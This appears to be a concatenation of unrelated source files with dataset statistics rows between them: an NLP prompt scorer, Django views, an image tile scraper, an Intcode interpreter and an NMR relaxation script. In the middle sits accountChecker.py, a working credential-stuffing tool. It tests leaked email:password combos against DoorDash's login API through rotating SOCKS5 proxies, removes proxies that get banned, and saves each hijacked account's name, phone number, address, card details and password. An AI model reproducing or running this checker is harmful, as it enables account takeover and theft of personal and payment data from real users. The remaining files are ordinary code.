mask1_rank, mask2_rank = 2, 1
return sentence, mask1_rank, mask2_rank
#######################################
# #
# LOGICAL #
# #
#######################################
class LogicalPromptScorer:
def __init__(self, model = None, tokenizer = None, device = None, dataset_name = ''):
# Model used to compute scores
self.model = model
self.tokenizer = tokenizer
self.device = device
# Load prompts materials
self.dets_list = DETS_LIST
self.structs_dict = {'prefixes': LOGICAL_PREFIXES_LIST,
'struct_lw': LOGICAL_STRUCTS_LW_LIST}
# Define template
self.vanilla_template = '<PREFIX1> <DET1> <WORD1> <STRUCT_LW> <LW> <PREFIX2> <DET2> <WORD2>.'
self.key_template = '<det1>-<det2>-<prefixes>-<struct_lw>'
# Compute keys
self._compute_keys()
# Where to save data
        self.filename = os.path.join('prompts', 'scores', 'logical_prompts_scores_{}'.format(dataset_name))
# Compute Prompts
self.create_prompts()
def _compute_keys(self):
"""
Compute all the possible keys in the form idx_{det1}-idx_{det2}-idx_{prefixes}-idx_{struct_lw}
"""
N_dets = len(self.dets_list)
N_prefixes = len(self.structs_dict['prefixes'])
N_struct_lw = len(self.structs_dict['struct_lw'])
list_of_keys = []
for idx_det1 in range(N_dets):
for idx_det2 in range(N_dets):
for idx_prefixes in range(N_prefixes):
for idx_struct_lw in range(N_struct_lw):
key = self.key_template.replace('<det1>', str(idx_det1)).replace('<det2>', str(idx_det2))
key = key.replace('<prefixes>', str(idx_prefixes)).replace('<struct_lw>', str(idx_struct_lw))
list_of_keys.append(key)
self.list_of_keys = list_of_keys
def _from_key_to_words(self, key):
"""
        Expect a key of the form idx_{det1}-idx_{det2}-idx_{prefixes}-idx_{struct_lw} and return the corresponding entries.
"""
list_of_idx = [int(idx) for idx in key.split('-')]
det1 = self.dets_list[list_of_idx[0]]
det2 = self.dets_list[list_of_idx[1]]
prefixes = self.structs_dict['prefixes'][list_of_idx[2]]
struct_lw = self.structs_dict['struct_lw'][list_of_idx[3]]
return [det1, det2, prefixes, struct_lw]
def _create_prompt(self, dets, prefixes, struct_lw):
det1, det2 = dets
prefix1, prefix2 = prefixes
# Sentence in the right order "This is a seagull, therefore it is a bird."
sentence = self.vanilla_template.replace('<DET1>', det1).replace('<DET2>', det2)
sentence = sentence.replace('<PREFIX1>', prefix1).replace('<PREFIX2>', prefix2).replace('<STRUCT_LW>', struct_lw)
# Sentence in the reverse order "It is a bird, therefore this is a seagull."
sentence_reverse = self.vanilla_template.replace('<DET1>', det2).replace('<DET2>', det1)
sentence_reverse = sentence_reverse.replace('<PREFIX1>', prefix2).replace('<PREFIX2>', prefix1).replace('<STRUCT_LW>', struct_lw)
return sentence, sentence_reverse
def create_prompts(self):
"""
Returns : keys idx_{det1}-idx_{det2}-idx_{prefixes}-idx_{struct_lw}
value [sentence, sentence_reverse]
"""
dict_of_prompts = {}
for key in self.list_of_keys:
words_from_keys = self._from_key_to_words(key)
dets, prefixes, struct_lw = words_from_keys[0:2], words_from_keys[2], words_from_keys[3]
sentence, sentence_reverse = self._create_prompt(dets, prefixes, struct_lw)
dict_of_prompts[key] = [sentence, sentence_reverse]
self.dict_of_prompts = dict_of_prompts
def compute_all_pairs_scores(self, logical_words, list_of_words):
"""
expect words = list of pairs [HYPONYM, NOUN]
returns : dict -> key "HYPONYM---NOUN"
value dict -> keys idx_{det1}-idx_{det2}-idx_{prefixes}-idx_{struct_lw}
value [[score_lw for lw in logical_words], [score_reverse_lw for lw in logical_words]]
"""
# Tokenize the logical words
logical_words_ids = []
for lw in logical_words:
input_ids = self.tokenizer(lw)['input_ids'][1:-1]
assert len(input_ids) == 1 # We only keep logical words mapped to a single token
logical_words_ids.append(input_ids[0])
# Compute Prompts Scores
        if os.path.exists(self.filename): # Previous save
            with open(self.filename, 'rb') as savefile:
                all_pairs_scores_dict = pickle.load(savefile)
else:
all_pairs_scores_dict = {}
num_treated = 0
for words in tqdm.tqdm(list_of_words, total = len(list_of_words)):
word1, word2 = words
key = word1 + '---' + word2
if key in all_pairs_scores_dict.keys(): # If we have already computed this key go to the next
continue
scores_dict = self.batch_compute_one_pair_scores(logical_words_ids, words)
all_pairs_scores_dict[key] = scores_dict
num_treated += 1
            if num_treated % 20000 == 0: # Save from time to time
                with open(self.filename, 'wb') as savefile:
                    pickle.dump(all_pairs_scores_dict, savefile)
self.all_pairs_scores_dict = all_pairs_scores_dict
        # Save scores
        with open(self.filename, 'wb') as savefile:
            pickle.dump(all_pairs_scores_dict, savefile)
def compute_one_pair_scores(self, logical_words_ids, words):
"""
expect words = [HYPONYM, NOUN]
returns : dict -> keys idx_{det1}-idx_{det2}-idx_{prefixes}-idx_{struct_lw}
value [[score_lw for lw in logical_words], [score_reverse_lw for lw in logical_words]]
"""
word1, word2 = words
# Construct sentences
scores_dict = {}
for key in self.list_of_keys:
sentence, sentence_reverse = self.dict_of_prompts[key]
sentence = sentence.replace('<WORD1>', word1).replace('<WORD2>', word2).replace('<LW>', self.tokenizer.mask_token)
sentence_reverse = sentence_reverse.replace('<WORD1>', word2).replace('<WORD2>', word1).replace('<LW>', self.tokenizer.mask_token)
# Compute scores for sentence
encoding = self.tokenizer(sentence,
return_tensors='pt'
)
input_ids = encoding['input_ids'].to(self.device)
attention_mask = encoding['attention_mask'].to(self.device)
mask_pos = self.find_mask_pos(input_ids)
scores = self._compute_model_score(input_ids, attention_mask, logical_words_ids, mask_pos)
# Compute scores for sentence_reverse
encoding_reverse = self.tokenizer(sentence_reverse,
return_tensors='pt'
)
input_ids_reverse = encoding_reverse['input_ids'].to(self.device)
attention_mask_reverse = encoding_reverse['attention_mask'].to(self.device)
mask_pos_reverse = self.find_mask_pos(input_ids_reverse)
scores_reverse = self._compute_model_score(input_ids_reverse, attention_mask_reverse, logical_words_ids, mask_pos_reverse)
scores_dict[key] = [scores, scores_reverse]
return scores_dict
def batch_compute_one_pair_scores(self, logical_words_ids, words):
"""
expect words = [HYPONYM, NOUN]
returns : dict -> keys idx_{det1}-idx_{det2}-idx_{prefixes}-idx_{struct_lw}
value [[score_lw for lw in logical_words], [score_reverse_lw for lw in logical_words]]
"""
word1, word2 = words
# Construct sentences
scores_dict = {}
sentences = []
for key in self.list_of_keys:
sentence, sentence_reverse = self.dict_of_prompts[key]
sentence = sentence.replace('<WORD1>', word1).replace('<WORD2>', word2).replace('<LW>', self.tokenizer.mask_token)
sentence_reverse = sentence_reverse.replace('<WORD1>', word2).replace('<WORD2>', word1).replace('<LW>', self.tokenizer.mask_token)
sentences.append(sentence)
sentences.append(sentence_reverse)
# Compute scores for sentence
encoding = self.tokenizer(sentences,
padding = True,
return_tensors='pt')
input_ids = encoding['input_ids'].to(self.device)
attention_mask = encoding['attention_mask'].to(self.device)
mask_pos = self.find_mask_pos(input_ids)
scores = self._batch_compute_model_score(input_ids, attention_mask, logical_words_ids, mask_pos)
for k in range(len(self.list_of_keys)):
key = self.list_of_keys[k]
scores_dict[key] = [scores[2*k], scores[2*k + 1]]
return scores_dict
def _compute_model_score(self, input_ids, attention_mask, masked_token_ids, mask_pos):
# Compute the probabilities and ranks from the model
with torch.no_grad():
probs_n_ranks = self.model.compute_multiple_mono_token(input_ids, attention_mask, mask_pos, masked_token_ids)
# Compute scores
scores = probs_n_ranks[:,0] # drop rank
return scores
def _batch_compute_model_score(self, input_ids, attention_mask, masked_token_ids, mask_pos):
# Compute the probabilities and ranks from the model
with torch.no_grad():
probs = self.model.compute_batch_multiple_mono_token(input_ids, attention_mask, mask_pos, masked_token_ids)
return probs
def find_mask_pos(self, ids_seq):
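        # 103 is the [MASK] token id of the standard BERT vocabulary (hard-coded; BERT-style tokenizer assumed)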
return torch.where(ids_seq == 103)[1]
| 44.171271 | 197 | 0.603836 | 2,948 | 23,985 | 4.597354 | 0.071235 | 0.019036 | 0.016233 | 0.016528 | 0.750609 | 0.699993 | 0.671733 | 0.635284 | 0.626798 | 0.618166 | 0 | 0.017071 | 0.291724 | 23,985 | 543 | 198 | 44.171271 | 0.780728 | 0.186492 | 0 | 0.537037 | 0 | 0.006173 | 0.048548 | 0.008574 | 0 | 0 | 0 | 0 | 0.003086 | 1 | 0.080247 | false | 0 | 0.018519 | 0.003086 | 0.160494 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3969c2344d1fd1927504d6b7d57dcf4c82c4a97 | 5,420 | py | Python | eCommerce/DoorDash/accountChecker.py | MiyakoYakota/PythonCheckers | 275c8b674e3ee284548fcd0512f432792e0d8b6d | [
"Unlicense"
] | 5 | 2021-02-24T23:37:52.000Z | 2021-08-18T06:39:30.000Z | eCommerce/DoorDash/accountChecker.py | MiyakoYakota/PythonCheckers | 275c8b674e3ee284548fcd0512f432792e0d8b6d | [
"Unlicense"
] | null | null | null | eCommerce/DoorDash/accountChecker.py | MiyakoYakota/PythonCheckers | 275c8b674e3ee284548fcd0512f432792e0d8b6d | [
"Unlicense"
] | 1 | 2021-03-26T06:21:20.000Z | 2021-03-26T06:21:20.000Z | import requests
import random
import json
from multiprocessing import Pool # Multi-Threading
from multiprocessing import freeze_support # Windows Support
requests.packages.urllib3.disable_warnings()
accounts = [line.rstrip('\n') for line in open("combo.txt", 'r')]
proxies = [line.rstrip('\n') for line in open("proxies.txt", 'r')]
workingJson = []
headers = {
'Content-Type': 'application/json',
}
def generateSocks5ProxyUrl(ip, port, username=None, password=None):
if(username and password):
return {
'http': f"socks5://{username}:{password}@{ip}:{port}",
'https': f"socks5://{username}:{password}@{ip}:{port}"
}
else:
return {
'http': f"socks5://{ip}:{port}",
'https': f"socks5://{ip}:{port}"
}
def generateLoginPayload(email, password):
return {
"email": email,
"password": password
}
def createOutputString(email, password, first_name, last_name, phone_number, account_credits, printable_address, default_card_type, default_card_exp_month, default_card_exp_year, default_card_last4, show_alcohol_experience):
response = f"{email}:{password} | "
if first_name and last_name:
response += f"Name: {first_name} {last_name} | "
if phone_number:
response += f"Phone Number: {phone_number} | "
if account_credits:
response += f"Account Credits: {account_credits} | "
if printable_address:
response += f"Default Address: {printable_address} | "
if default_card_type and default_card_exp_month and default_card_exp_year and default_card_last4:
response += f"Default Card: {default_card_type}*{default_card_last4} Expires {default_card_exp_month}/{default_card_exp_year} | "
if show_alcohol_experience:
response += F"Alcohol Allowed: {str(show_alcohol_experience)} |"
response = response[:-2] + "\n"
return response
def checkAccount(account):
global proxies
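    # NOTE: with multiprocessing.Pool each worker process gets its own copy of
    # `proxies`, so removing a banned proxy below only affects that worker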
proxy = random.choice(proxies)
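    # proxies.txt lines are assumed to be "ip:port:username:password"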
ip, port, username, password = proxy.split(':')
userEmail, userPassword = account.split(':')
proxyUrl = generateSocks5ProxyUrl(ip, port, username, password)
try:
response = requests.post('https://api.doordash.com/v2/auth/web_login/', proxies=proxyUrl, headers=headers, data=json.dumps(generateLoginPayload(userEmail, userPassword)))
if (response.status_code == 403 or response.status_code == 406 or 'Access Denied' in response.text):
print(f"[Cloudflare Banned Proxy] {proxy}")
elif ('Login banned due to violation of terms of service' in response.text):
print(f"[Banned Proxy] {proxy}")
proxies.remove(proxy)
elif ('id' in response.text):
# Convert response to JSON
userData = response.json()
# Inject the user's password into the response object
userData['password'] = userPassword
# User's Personal Info
first_name = userData['first_name'] or None
last_name = userData['last_name'] or None
phone_number = userData['phone_number'] or None
# Account Credits
account_credits = userData['account_credits'] or None
# Default Address Info
default_address = userData['default_address'] or None
if default_address:
printable_address = default_address['printable_address'] or None
else:
printable_address = None
# Default Card Info
default_card = userData['default_card'] or None
if default_card:
default_card_type = default_card['type'] or None
default_card_exp_month = default_card['exp_month'] or None
default_card_exp_year = default_card['exp_year'] or None
default_card_last4 = default_card['last4'] or None
else:
default_card_type = None
default_card_exp_month = None
default_card_exp_year = None
default_card_last4 = None
            # Can receive alcohol
show_alcohol_experience = userData['show_alcohol_experience'] or None
# Combine into one string
outputString = createOutputString(userEmail, userPassword, first_name, last_name, phone_number, account_credits, printable_address, default_card_type, default_card_exp_month, default_card_exp_year, default_card_last4, show_alcohol_experience)
print(f"[Good Account] {outputString}")
            try:
                with open('out.txt', 'a') as f:
                    f.write(outputString)
            except Exception:
                print('[Write Fail] Failed to write account information to working file')
            try:
                workingJson.append(response.json())
                with open('data.json', 'w') as outfile:
                    json.dump(workingJson, outfile)
            except Exception:
                print('[Write Fail] Failed to write account information to JSON')
except Exception as e:
print(f'[Checking Failed] {e}')
def main():
numThreads = input("How many threads would you like to use? ")
freeze_support()
pool = Pool(int(numThreads))
pool.map(checkAccount, accounts)
pool.close()
pool.join()
if __name__ == "__main__":
main() | 43.015873 | 254 | 0.632103 | 616 | 5,420 | 5.350649 | 0.261364 | 0.110134 | 0.059466 | 0.040352 | 0.257282 | 0.209041 | 0.182646 | 0.135619 | 0.124393 | 0.124393 | 0 | 0.005525 | 0.265314 | 5,420 | 126 | 255 | 43.015873 | 0.8222 | 0.042066 | 0 | 0.102804 | 0 | 0 | 0.2088 | 0.04342 | 0 | 0 | 0 | 0 | 0 | 1 | 0.046729 | false | 0.130841 | 0.046729 | 0.009346 | 0.130841 | 0.11215 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
d3979bc7f150cc1b30133b1b6f53958cab7914a1 | 1,732 | py | Python | resource/views.py | madre/PersonalWeb | 27d88a3c6c4f86028887b0455b60eceeeb663e25 | [
"Apache-2.0"
] | null | null | null | resource/views.py | madre/PersonalWeb | 27d88a3c6c4f86028887b0455b60eceeeb663e25 | [
"Apache-2.0"
] | null | null | null | resource/views.py | madre/PersonalWeb | 27d88a3c6c4f86028887b0455b60eceeeb663e25 | [
"Apache-2.0"
] | null | null | null | #coding=utf-8
"""
__create_time__ = '13-10-18'
__author__ = 'Madre'
"""
from django.shortcuts import get_object_or_404
from django.views.generic import ListView, DetailView
from resource.models import Resource, Topic
class ResourceListView(ListView):
context_object_name = 'resource_list'
template_name = "resource_list.html"
model = Resource
def get_context_data(self, **kwargs):
context = super(ResourceListView, self).get_context_data(**kwargs)
context["topic_list"] = Topic.objects.all()
return context
class ResourceDetailView(DetailView):
context_object_name = 'resource'
model = Resource
template_name = "resource_detail.html"
def get_object(self):
resource = get_object_or_404(Resource, pk=self.kwargs['pk'])
return resource
def get_context_data(self, **kwargs):
context = super(ResourceDetailView, self).get_context_data(**kwargs)
context["topic_list"] = Topic.objects.all()
return context
class DocsResourceView(ListView):
context_object_name = 'resource_list'
template_name = "resource_docs.html"
model = Resource
def get_queryset(self):
return Resource.objects.filter(resource_type__slug="docs")
class TopicDetailView(DetailView):
context_object_name = 'topic'
model = Topic
template_name = "topic_detail.html"
def get_object(self):
topic = get_object_or_404(Topic, pk=self.kwargs['pk'])
return topic
def get_context_data(self, **kwargs):
context = super(TopicDetailView, self).get_context_data(**kwargs)
context["topic_list"] = Topic.objects.all()
return context | 29.355932 | 77 | 0.680139 | 199 | 1,732 | 5.633166 | 0.256281 | 0.064228 | 0.074933 | 0.037467 | 0.521855 | 0.457627 | 0.41124 | 0.41124 | 0.37645 | 0.190901 | 0 | 0.011826 | 0.218822 | 1,732 | 59 | 78 | 29.355932 | 0.816704 | 0.035797 | 0 | 0.410256 | 0 | 0 | 0.093458 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0 | 0.076923 | 0.025641 | 0.794872 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
d3a01df5042d3b5b926bb9ab84e5cc8b7a1afdf6 | 1,304 | py | Python | tilescraper.py | azaroth42/iiif-harvester | 42202bb2edfbaceab594755b26ee75a81baa7212 | [
"Apache-2.0"
] | 2 | 2015-08-14T07:36:33.000Z | 2019-03-18T00:10:02.000Z | tilescraper.py | azaroth42/iiif-harvester | 42202bb2edfbaceab594755b26ee75a81baa7212 | [
"Apache-2.0"
] | null | null | null | tilescraper.py | azaroth42/iiif-harvester | 42202bb2edfbaceab594755b26ee75a81baa7212 | [
"Apache-2.0"
] | null | null | null | from PIL import Image
import json, StringIO, requests
import time
import robotparser
import re
import sys
host = "http://dlss-dev-azaroth.stanford.edu/"
service = host + "services/iiif/f1rc/"
resp = requests.get(service + "info.json")
js = json.loads(resp.text)
h = js['height']
w = js['width']
img = Image.new("RGB", (w,h), "white")
## Respect tile dimensions of server
tilesize = 1024
if 'tiles' in js:
tilesize = js['tiles'][0]['width']
## Introduce baseline crawl delay
delay = 1
## Parse robots.txt
resp = requests.get(host + "/robots.txt")
if resp.status_code == 200:
parser = robotparser.RobotFileParser()
    parser.parse(resp.text.splitlines())  # parse() expects an iterable of lines, not a raw string
okay = parser.can_fetch("*", service)
if not okay:
print "Blocked by robots.txt"
sys.exit()
# No support for Crawl-delay extension ... just search
cd = re.compile("Crawl-delay: ([0-9]+)")
m = cd.search(resp.text)
if m:
delay = int(m.groups()[0])
for x in range(w/tilesize+1):
for y in range(h/tilesize+1):
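        # IIIF Image API region parameter is "x,y,w,h" in full-image pixel coordinates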
region = "%s,%s,%s,%s" % (x*tilesize, y*tilesize, tilesize, tilesize)
        tileresp = requests.get(service + ("%s/full/0/default.jpg" % region))  # service already ends with '/'
tile = Image.open(StringIO.StringIO(tileresp.content))
img.paste(tile, (x*tilesize,y*tilesize))
sys.stdout.write('.')
sys.stdout.flush()
time.sleep(delay)
img.save("full.jpg")
| 25.076923 | 72 | 0.680982 | 200 | 1,304 | 4.425 | 0.495 | 0.037288 | 0.033898 | 0.040678 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014286 | 0.141104 | 1,304 | 51 | 73 | 25.568627 | 0.775893 | 0.102761 | 0 | 0 | 0 | 0 | 0.167959 | 0.018949 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.153846 | null | null | 0.025641 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3a1a2d7710ed6f28bb8bbf86045de75345d5240 | 348 | py | Python | api/mira/api_config.py | tnc-ca-geo/animl-ml | 95aeb1e99fddf7199692144ef3425340d6b8dc3c | [
"MIT"
] | 1 | 2020-03-28T02:10:25.000Z | 2020-03-28T02:10:25.000Z | api/mira/api_config.py | tnc-ca-geo/animl-ml | 95aeb1e99fddf7199692144ef3425340d6b8dc3c | [
"MIT"
] | 46 | 2020-03-18T22:44:30.000Z | 2022-03-12T00:51:44.000Z | api/mira/api_config.py | tnc-ca-geo/animl-ml | 95aeb1e99fddf7199692144ef3425340d6b8dc3c | [
"MIT"
] | null | null | null | """
MIRA API config
"""
MODELS = [
{
"endpoint_name": "mira-large",
"classes": ["fox", "skunk", "empty"]
},
{
"endpoint_name": "mira-small",
"classes": ["rodent", "empty"]
}
]
HEADERS = {
"Access-Control-Allow-Origin": "*",
"Access-Control-Allow-Headers": "Content-Type",
"Access-Control-Allow-Methods": "POST"
} | 17.4 | 51 | 0.566092 | 35 | 348 | 5.571429 | 0.628571 | 0.2 | 0.276923 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.198276 | 348 | 20 | 52 | 17.4 | 0.698925 | 0.043103 | 0 | 0 | 0 | 0 | 0.564417 | 0.254601 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3a22369e4aa53efec521f3dd343a0ada49809f4 | 3,545 | py | Python | AdventOfCode2019/day05.py | Matematik411/Advent-of-Code-Practice | f556ae8b84526368184f72a811949ec1fd4b686e | [
"MIT"
] | null | null | null | AdventOfCode2019/day05.py | Matematik411/Advent-of-Code-Practice | f556ae8b84526368184f72a811949ec1fd4b686e | [
"MIT"
] | null | null | null | AdventOfCode2019/day05.py | Matematik411/Advent-of-Code-Practice | f556ae8b84526368184f72a811949ec1fd4b686e | [
"MIT"
] | null | null | null | class Int_code:
def __init__(self, s, inputs):
memory = {}
nrs = map(int, s.split(","))
for i, x in enumerate(nrs):
memory[i] = x
self.memory = memory
self.inputs = inputs
def set(self, i, x):
self.memory[i] = x
def one(self, a, b, c, modes):
if modes % 10 == 0:
a = self.memory[a]
modes //= 10
if modes % 10 == 0:
b = self.memory[b]
self.memory[c] = a + b
def two(self, a, b, c, modes):
if modes % 10 == 0:
a = self.memory[a]
modes //= 10
if modes % 10 == 0:
b = self.memory[b]
self.memory[c] = a * b
def three(self, a, modes):
x = self.inputs.pop(0)
self.memory[a] = x
def four(self, a, modes):
if modes % 10 == 0:
a = self.memory[a]
print(a)
def five(self, a, b, modes):
if modes % 10 == 0:
a = self.memory[a]
modes //= 10
if modes % 10 == 0:
b = self.memory[b]
if a != 0:
return (True, b)
else:
return (False, 0)
def six(self, a, b, modes):
if modes % 10 == 0:
a = self.memory[a]
modes //= 10
if modes % 10 == 0:
b = self.memory[b]
if a == 0:
return (True, b)
else:
return (False, 0)
def seven(self, a, b, c, modes):
if modes % 10 == 0:
a = self.memory[a]
modes //= 10
if modes % 10 == 0:
b = self.memory[b]
self.memory[c] = 1 if (a < b) else 0
def eight(self, a, b, c, modes):
if modes % 10 == 0:
a = self.memory[a]
modes //= 10
if modes % 10 == 0:
b = self.memory[b]
self.memory[c] = 1 if (a == b) else 0
def run(self, start):
i = start
while True:
c = self.memory[i]
modes = c // 100
c %= 100
# print(i, self.memory[i])
if c == 99:
break
elif c == 1:
self.one(self.memory[i+1], self.memory[i+2], self.memory[i+3], modes)
i += 4
elif c == 2:
self.two(self.memory[i+1], self.memory[i+2], self.memory[i+3], modes)
i += 4
elif c == 3:
self.three(self.memory[i+1], modes)
i += 2
elif c == 4:
self.four(self.memory[i+1], modes)
i += 2
elif c == 5:
sol = self.five(self.memory[i+1], self.memory[i+2], modes)
if sol[0]:
i = sol[1]
else:
i += 3
elif c == 6:
sol = self.six(self.memory[i+1], self.memory[i+2], modes)
if sol[0]:
i = sol[1]
else:
i += 3
elif c == 7:
self.seven(self.memory[i+1], self.memory[i+2], self.memory[i+3], modes)
i += 4
elif c == 8:
self.eight(self.memory[i+1], self.memory[i+2], self.memory[i+3], modes)
i += 4
return self.memory[0]
start = input()
# part one
inputs_1 = [1]
computer = Int_code(start, inputs_1)
computer.run(0)
# part two
inputs_2 = [5]
computer = Int_code(start, inputs_2)
computer.run(0)
# # test
# inputs = [3]
# computer = Int_code(start, inputs)
# computer.run(0)
| 27.695313 | 87 | 0.414386 | 486 | 3,545 | 2.997942 | 0.121399 | 0.2814 | 0.158545 | 0.089224 | 0.663006 | 0.609472 | 0.609472 | 0.609472 | 0.609472 | 0.557996 | 0 | 0.059271 | 0.443159 | 3,545 | 127 | 88 | 27.913386 | 0.678825 | 0.031594 | 0 | 0.486486 | 0 | 0 | 0.000292 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.099099 | false | 0 | 0 | 0 | 0.153153 | 0.009009 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3a3af9d53824b3acab405765cd51062c38ff21a | 4,177 | py | Python | fluorelax/fluorelax.py | darianyang/fluorelax | 4ca816aa157f23c84eb4cc6085200668723d1426 | [
"BSD-3-Clause"
] | null | null | null | fluorelax/fluorelax.py | darianyang/fluorelax | 4ca816aa157f23c84eb4cc6085200668723d1426 | [
"BSD-3-Clause"
] | null | null | null | fluorelax/fluorelax.py | darianyang/fluorelax | 4ca816aa157f23c84eb4cc6085200668723d1426 | [
"BSD-3-Clause"
] | 1 | 2022-03-27T18:24:49.000Z | 2022-03-27T18:24:49.000Z | """
Main call.
TODO:
- parallize the mda processing portion? (dask)
"""
import numpy as np
import matplotlib.pyplot as plt
import MDAnalysis as mda
from command_line import create_cmd_arguments, handle_command_line
from calc_relax import Calc_19F_Relaxation
from calc_fh_dists import Calc_FH_Dists
from plot_relax import Plot_Relaxation
# if python file is being used
if __name__ == '__main__':
# args_list to save time for now (TODO)
magnet = 14.1 # Tesla (600 MHz of 1H+)
tc = 8.2e-9 # 8.2ns for CypA, tc in sec
"""
Command line
"""
# Create command line arguments with argparse
argument_parser = create_cmd_arguments()
# Retrieve list of args
args = handle_command_line(argument_parser)
# TODO: hack for now, later put as seperate args?
# CSA tensors for 4F-Trp
if args.system == "w4f":
sgm11 = 11.2
sgm22 = -48.3
sgm33 = -112.8
elif args.system == "w5f":
sgm11 = 4.8
sgm22 = -60.5
sgm33 = -86.1
elif args.system == "w6f":
sgm11 = 12.9
sgm22 = -51.2
sgm33 = -91.6
elif args.system == "w7f":
sgm11 = 4.6
sgm22 = -48.3
sgm33 = -123.3
"""
Load trajectory or pdb data and calc all F-H distances.
# TODO: do for each frame, also test with water
"""
# TODO: for big trajectories, can't load in_memory, must stream it but this can be slow
traj = mda.Universe(args.parm, args.crd, in_memory=True, in_memory_step=args.step_size)
fh_dist_base = Calc_FH_Dists(traj, dist=3).run()
"""
For each distance value, calculate the R1 and R2 value.
"""
    # TODO: update to ndarrays, maybe make into a function or separate script?
    # test speed and optimize
    # TODO: make this able to take multiple files and find stdev, maybe a separate proc function
# array of size frames x 3 columns (frame, avg R1, avg R2) # TODO: add stdev?
r1_r2 = np.zeros(shape=(len(fh_dist_base.results[:,1:]), 3))
r1_r2[:, 0] = fh_dist_base.results[:,0]
    # Here: calling each calc class separately and only summing the dd contributions; csa is not distance dependent
    # note this new implementation is a lot slower (compared to having just one calc_relax and averaging later)
# but not sure, didn't test the difference
for num, dists in enumerate(fh_dist_base.results[:,1:]):
calc_relax = Calc_19F_Relaxation(tc, magnet, sgm11, sgm22, sgm33)
r1_csa = calc_relax.calc_csa_r1()
r2_csa = calc_relax.calc_csa_r2()
# TODO: these are relatively small lists, may not need to change to ndarray
# but if I do, then I need to cut out the NaN or zero values before the np.mean step
r1_dd = 0
r2_dd = 0
for fh_dist in dists:
if fh_dist == 0:
continue # TODO: is there a better way to do this?
# instantiate the calc_relax class and then call individual class methods
calc_relax = Calc_19F_Relaxation(tc, magnet, sgm11, sgm22, sgm33, fh_dist)
# sum each dd contribution
r1_dd += calc_relax.calc_dd_r1()
r2_dd += calc_relax.calc_dd_r2()
# fill in col 1 (R1), col 2 (R2)
r1_r2[num, 1] = r1_dd + r1_csa
r1_r2[num, 2] = r2_dd + r2_csa
        # test separate values
print(r1_dd, r1_csa)
print(r2_dd, r2_csa)
"""
Save the frame, avg and stdev R1 and R2 data as a tsv?
"""
if args.output_file is not None:
np.savetxt(args.output_file, r1_r2, delimiter="\t")
"""
Plot the R1 and R2 data.
"""
# plt.plot(fh_dist_base.results[:,0], r1_r2[:,0])
# plt.plot(fh_dist_base.results[:,0], r1_r2[:,1])
plt.plot(r1_r2[:, 0], r1_r2[:, 1])
plt.plot(r1_r2[:, 0], r1_r2[:, 2])
print(f"R1-AVG={np.mean(r1_r2[:,1])}\nR2-AVG={np.mean(r1_r2[:,2])}")
#plt.hlines(1.99, xmin=0, xmax=fh_dist_base.results[-1,0]) # R1
#plt.hlines(109.1, xmin=0, xmax=fh_dist_base.results[-1,0]) # R2
plt.show()
# plotter class
# plotter = Plot_Relaxation(r1_r2, "dist")
# plotter.plot_r2()
# plt.show()
| 33.95935 | 113 | 0.620541 | 657 | 4,177 | 3.782344 | 0.357686 | 0.025755 | 0.032193 | 0.047887 | 0.160161 | 0.098994 | 0.098994 | 0.098994 | 0.098994 | 0.055131 | 0 | 0.063487 | 0.272205 | 4,177 | 122 | 114 | 34.237705 | 0.753947 | 0.374431 | 0 | 0.037037 | 0 | 0.018519 | 0.035794 | 0.025951 | 0 | 0 | 0 | 0.04918 | 0 | 1 | 0 | false | 0 | 0.12963 | 0 | 0.12963 | 0.055556 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3aa5533cd819bec8e09e75cda19441c06cdc1f9 | 269 | py | Python | api/admin_urls.py | chenxiaoli/auth21 | a2b15ecb883416e011da03d6ec066459fa28f693 | [
"MIT"
] | null | null | null | api/admin_urls.py | chenxiaoli/auth21 | a2b15ecb883416e011da03d6ec066459fa28f693 | [
"MIT"
] | null | null | null | api/admin_urls.py | chenxiaoli/auth21 | a2b15ecb883416e011da03d6ec066459fa28f693 | [
"MIT"
